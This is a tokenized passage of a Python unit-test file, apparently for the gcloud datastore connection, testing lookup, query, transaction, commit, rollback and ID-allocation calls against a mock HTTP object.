assertEqual ( conn . build_api_url ( PROJECT , METHOD , BASE , VER ) , <EOL> URI ) <EOL> def test_lookup_single_key_empty_response ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . 
assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> def test_lookup_single_key_empty_response_w_eventual ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] , <EOL> eventual = True ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( request . read_options . read_consistency , <EOL> datastore_pb2 . ReadOptions . EVENTUAL ) <EOL> self . assertEqual ( request . read_options . transaction , b'<STR_LIT>' ) <EOL> def test_lookup_single_key_empty_response_w_eventual_and_transaction ( self ) : <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> key_pb = self . 
_make_key_pb ( PROJECT ) <EOL> conn = self . _makeOne ( ) <EOL> self . assertRaises ( ValueError , conn . lookup , PROJECT , key_pb , <EOL> eventual = True , transaction_id = TRANSACTION ) <EOL> def test_lookup_single_key_empty_response_w_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] , <EOL> transaction_id = TRANSACTION ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( request . read_options . transaction , TRANSACTION ) <EOL> def test_lookup_single_key_nonempty_response ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import entity_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> entity = entity_pb2 . Entity ( ) <EOL> entity . key . CopyFrom ( key_pb ) <EOL> rsp_pb . found . add ( entity = entity ) <EOL> conn = self . 
_makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> ( found , ) , missing , deferred = conn . lookup ( PROJECT , [ key_pb ] ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( found . key . path [ <NUM_LIT:0> ] . kind , '<STR_LIT>' ) <EOL> self . assertEqual ( found . key . path [ <NUM_LIT:0> ] . id , <NUM_LIT> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( key_pb , keys [ <NUM_LIT:0> ] ) <EOL> def test_lookup_multiple_keys_empty_response ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb1 = self . _make_key_pb ( PROJECT ) <EOL> key_pb2 = self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> found , missing , deferred = conn . lookup ( PROJECT , [ key_pb1 , key_pb2 ] ) <EOL> self . assertEqual ( len ( found ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . 
LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( key_pb1 , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( key_pb2 , keys [ <NUM_LIT:1> ] ) <EOL> def test_lookup_multiple_keys_w_missing ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb1 = self . _make_key_pb ( PROJECT ) <EOL> key_pb2 = self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> er_1 = rsp_pb . missing . add ( ) <EOL> er_1 . entity . key . CopyFrom ( key_pb1 ) <EOL> er_2 = rsp_pb . missing . add ( ) <EOL> er_2 . entity . key . CopyFrom ( key_pb2 ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> result , missing , deferred = conn . lookup ( PROJECT , [ key_pb1 , key_pb2 ] ) <EOL> self . assertEqual ( result , [ ] ) <EOL> self . assertEqual ( len ( deferred ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( [ missed . key for missed in missing ] , <EOL> [ key_pb1 , key_pb2 ] ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( key_pb1 , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( key_pb2 , keys [ <NUM_LIT:1> ] ) <EOL> def test_lookup_multiple_keys_w_deferred ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb1 = self . 
_make_key_pb ( PROJECT ) <EOL> key_pb2 = self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) <EOL> rsp_pb = datastore_pb2 . LookupResponse ( ) <EOL> rsp_pb . deferred . add ( ) . CopyFrom ( key_pb1 ) <EOL> rsp_pb . deferred . add ( ) . CopyFrom ( key_pb2 ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> result , missing , deferred = conn . lookup ( PROJECT , [ key_pb1 , key_pb2 ] ) <EOL> self . assertEqual ( result , [ ] ) <EOL> self . assertEqual ( len ( missing ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( [ def_key for def_key in deferred ] , [ key_pb1 , key_pb2 ] ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] , URI ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] , '<STR_LIT:POST>' ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] [ '<STR_LIT:Content-Type>' ] , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( cw [ '<STR_LIT>' ] [ '<STR_LIT>' ] , conn . USER_AGENT ) <EOL> rq_class = datastore_pb2 . LookupRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> keys = list ( request . keys ) <EOL> self . assertEqual ( len ( keys ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( key_pb1 , keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( key_pb2 , keys [ <NUM_LIT:1> ] ) <EOL> def test_run_query_w_eventual_no_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . 
QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs , end , more , skipped = conn . run_query ( PROJECT , q_pb , <EOL> eventual = True ) <EOL> self . assertEqual ( pbs , [ ] ) <EOL> self . assertEqual ( end , CURSOR ) <EOL> self . assertTrue ( more ) <EOL> self . assertEqual ( skipped , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> self . assertEqual ( request . read_options . read_consistency , <EOL> datastore_pb2 . ReadOptions . EVENTUAL ) <EOL> self . assertEqual ( request . read_options . transaction , b'<STR_LIT>' ) <EOL> def test_run_query_wo_eventual_w_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . 
api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs , end , more , skipped = conn . run_query ( <EOL> PROJECT , q_pb , transaction_id = TRANSACTION ) <EOL> self . assertEqual ( pbs , [ ] ) <EOL> self . assertEqual ( end , CURSOR ) <EOL> self . assertTrue ( more ) <EOL> self . assertEqual ( skipped , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> self . assertEqual ( <EOL> request . read_options . read_consistency , <EOL> datastore_pb2 . ReadOptions . READ_CONSISTENCY_UNSPECIFIED ) <EOL> self . assertEqual ( request . read_options . transaction , TRANSACTION ) <EOL> def test_run_query_w_eventual_and_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> self . assertRaises ( ValueError , conn . run_query , PROJECT , q_pb , <EOL> eventual = True , transaction_id = TRANSACTION ) <EOL> def test_run_query_wo_namespace_empty_result ( self ) : <EOL> from gcloud . datastore . 
_generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import query_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> CURSOR = b'<STR_LIT:\x00>' <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . end_cursor = CURSOR <EOL> no_more = query_pb2 . QueryResultBatch . NO_MORE_RESULTS <EOL> rsp_pb . batch . more_results = no_more <EOL> rsp_pb . batch . entity_result_type = query_pb2 . EntityResult . FULL <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs , end , more , skipped = conn . run_query ( PROJECT , q_pb ) <EOL> self . assertEqual ( pbs , [ ] ) <EOL> self . assertEqual ( end , CURSOR ) <EOL> self . assertTrue ( more ) <EOL> self . assertEqual ( skipped , <NUM_LIT:0> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> def test_run_query_w_namespace_nonempty_result ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import entity_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> KIND = '<STR_LIT>' <EOL> entity = entity_pb2 . Entity ( ) <EOL> q_pb = self . _make_query_pb ( KIND ) <EOL> rsp_pb = datastore_pb2 . RunQueryResponse ( ) <EOL> rsp_pb . batch . entity_results . add ( entity = entity ) <EOL> rsp_pb . batch . entity_result_type = <NUM_LIT:1> <EOL> rsp_pb . batch . more_results = <NUM_LIT:3> <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . 
join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> pbs = conn . run_query ( PROJECT , q_pb , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( len ( pbs ) , <NUM_LIT:1> ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . RunQueryRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . partition_id . namespace_id , '<STR_LIT>' ) <EOL> self . assertEqual ( request . query , q_pb ) <EOL> def test_begin_transaction ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> rsp_pb = datastore_pb2 . BeginTransactionResponse ( ) <EOL> rsp_pb . transaction = TRANSACTION <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . begin_transaction ( PROJECT ) , TRANSACTION ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . BeginTransactionRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> def test_commit_wo_transaction ( self ) : <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore import connection as MUT <EOL> from gcloud . datastore . helpers import _new_value_pb <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . 
CommitResponse ( ) <EOL> req_pb = datastore_pb2 . CommitRequest ( ) <EOL> mutation = req_pb . mutations . add ( ) <EOL> insert = mutation . upsert <EOL> insert . key . CopyFrom ( key_pb ) <EOL> value_pb = _new_value_pb ( insert , '<STR_LIT:foo>' ) <EOL> value_pb . string_value = u'<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> expected_result = object ( ) <EOL> _parsed = [ ] <EOL> def mock_parse ( response ) : <EOL> _parsed . append ( response ) <EOL> return expected_result <EOL> with _Monkey ( MUT , _parse_commit_response = mock_parse ) : <EOL> result = conn . commit ( PROJECT , req_pb , None ) <EOL> self . assertTrue ( result is expected_result ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . CommitRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . transaction , b'<STR_LIT>' ) <EOL> self . assertEqual ( list ( request . mutations ) , [ mutation ] ) <EOL> self . assertEqual ( request . mode , rq_class . NON_TRANSACTIONAL ) <EOL> self . assertEqual ( _parsed , [ rsp_pb ] ) <EOL> def test_commit_w_transaction ( self ) : <EOL> from gcloud . _testing import _Monkey <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore import connection as MUT <EOL> from gcloud . datastore . helpers import _new_value_pb <EOL> PROJECT = '<STR_LIT>' <EOL> key_pb = self . _make_key_pb ( PROJECT ) <EOL> rsp_pb = datastore_pb2 . CommitResponse ( ) <EOL> req_pb = datastore_pb2 . CommitRequest ( ) <EOL> mutation = req_pb . mutations . add ( ) <EOL> insert = mutation . upsert <EOL> insert . key . 
CopyFrom ( key_pb ) <EOL> value_pb = _new_value_pb ( insert , '<STR_LIT:foo>' ) <EOL> value_pb . string_value = u'<STR_LIT>' <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> expected_result = object ( ) <EOL> _parsed = [ ] <EOL> def mock_parse ( response ) : <EOL> _parsed . append ( response ) <EOL> return expected_result <EOL> with _Monkey ( MUT , _parse_commit_response = mock_parse ) : <EOL> result = conn . commit ( PROJECT , req_pb , b'<STR_LIT>' ) <EOL> self . assertTrue ( result is expected_result ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . CommitRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . transaction , b'<STR_LIT>' ) <EOL> self . assertEqual ( list ( request . mutations ) , [ mutation ] ) <EOL> self . assertEqual ( request . mode , rq_class . TRANSACTIONAL ) <EOL> self . assertEqual ( _parsed , [ rsp_pb ] ) <EOL> def test_rollback_ok ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> TRANSACTION = b'<STR_LIT>' <EOL> rsp_pb = datastore_pb2 . RollbackResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . rollback ( PROJECT , TRANSACTION ) , None ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . 
RollbackRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( request . transaction , TRANSACTION ) <EOL> def test_allocate_ids_empty ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> rsp_pb = datastore_pb2 . AllocateIdsResponse ( ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . allocate_ids ( PROJECT , [ ] ) , [ ] ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . AllocateIdsRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( list ( request . keys ) , [ ] ) <EOL> def test_allocate_ids_non_empty ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> PROJECT = '<STR_LIT>' <EOL> before_key_pbs = [ <EOL> self . _make_key_pb ( PROJECT , id_ = None ) , <EOL> self . _make_key_pb ( PROJECT , id_ = None ) , <EOL> ] <EOL> after_key_pbs = [ <EOL> self . _make_key_pb ( PROJECT ) , <EOL> self . _make_key_pb ( PROJECT , id_ = <NUM_LIT> ) , <EOL> ] <EOL> rsp_pb = datastore_pb2 . AllocateIdsResponse ( ) <EOL> rsp_pb . keys . add ( ) . CopyFrom ( after_key_pbs [ <NUM_LIT:0> ] ) <EOL> rsp_pb . keys . add ( ) . CopyFrom ( after_key_pbs [ <NUM_LIT:1> ] ) <EOL> conn = self . _makeOne ( ) <EOL> URI = '<STR_LIT:/>' . join ( [ <EOL> conn . api_base_url , <EOL> conn . API_VERSION , <EOL> '<STR_LIT>' , <EOL> PROJECT + '<STR_LIT>' , <EOL> ] ) <EOL> http = conn . _http = Http ( { '<STR_LIT:status>' : '<STR_LIT>' } , rsp_pb . SerializeToString ( ) ) <EOL> self . assertEqual ( conn . 
allocate_ids ( PROJECT , before_key_pbs ) , <EOL> after_key_pbs ) <EOL> cw = http . _called_with <EOL> self . _verifyProtobufCall ( cw , URI , conn ) <EOL> rq_class = datastore_pb2 . AllocateIdsRequest <EOL> request = rq_class ( ) <EOL> request . ParseFromString ( cw [ '<STR_LIT:body>' ] ) <EOL> self . assertEqual ( len ( request . keys ) , len ( before_key_pbs ) ) <EOL> for key_before , key_after in zip ( before_key_pbs , request . keys ) : <EOL> self . assertEqual ( key_before , key_after ) <EOL> class Test__parse_commit_response ( unittest2 . TestCase ) : <EOL> def _callFUT ( self , commit_response_pb ) : <EOL> from gcloud . datastore . connection import _parse_commit_response <EOL> return _parse_commit_response ( commit_response_pb ) <EOL> def test_it ( self ) : <EOL> from gcloud . datastore . _generated import datastore_pb2 <EOL> from gcloud . datastore . _generated import entity_pb2 <EOL> index_updates = <NUM_LIT> <EOL> keys = [ <EOL> entity_pb2 . Key ( <EOL> path = [ <EOL> entity_pb2 . Key . PathElement ( <EOL> kind = '<STR_LIT>' , <EOL> id = <NUM_LIT> , <EOL> ) , <EOL> ] , <EOL> ) , <EOL> entity_pb2 . Key ( <EOL> path = [ <EOL> entity_pb2 . Key . PathElement ( <EOL> kind = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] , <EOL> ) , <EOL> ] <EOL> response = datastore_pb2 . CommitResponse ( <EOL> mutation_results = [ <EOL> datastore_pb2 . MutationResult ( key = key ) for key in keys <EOL> ] , <EOL> index_updates = index_updates , <EOL> ) <EOL> result = self . _callFUT ( response ) <EOL> self . assertEqual ( result , ( index_updates , keys ) ) <EOL> class Http ( object ) : <EOL> _called_with = None <EOL> def __init__ ( self , headers , content ) : <EOL> from httplib2 import Response <EOL> self . _response = Response ( headers ) <EOL> self . _content = content <EOL> def request ( self , ** kw ) : <EOL> self . _called_with = kw <EOL> return self . _response , self . 
_content <EOL> class _PathElementProto ( object ) : <EOL> def __init__ ( self , _id ) : <EOL> self . id = _id <EOL> class _KeyProto ( object ) : <EOL> def __init__ ( self , id_ ) : <EOL> self . path = [ _PathElementProto ( id_ ) ] </s>
